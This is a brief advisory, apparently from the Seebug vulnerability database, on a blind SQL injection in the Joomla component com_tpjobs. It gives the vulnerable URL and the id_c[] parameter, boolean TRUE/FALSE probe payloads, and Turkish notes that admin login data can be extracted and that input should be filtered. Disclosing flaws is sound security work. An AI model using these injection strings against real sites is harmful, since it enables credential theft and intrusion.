Joomla Component com_tpjobs Blind SQL injection Vulnerability

2014-07-01T00:00:00
ID SSV:67383
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

<------------------- header data start ------------------- >

Joomla Component com_tpjobs Blind SQL injection Vulnerability

author : FL0RiX

Name : com_tpjobs

Bug Type : (Blind) SQL Injection

Infection : Admin login bilgileri alınabilir.

Demo Vuln. :

TRUE(+) » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1 FALSE(-) » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

Bug Fix Advice : Zararlı karakterler filtrelenmelidir.

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end of -- >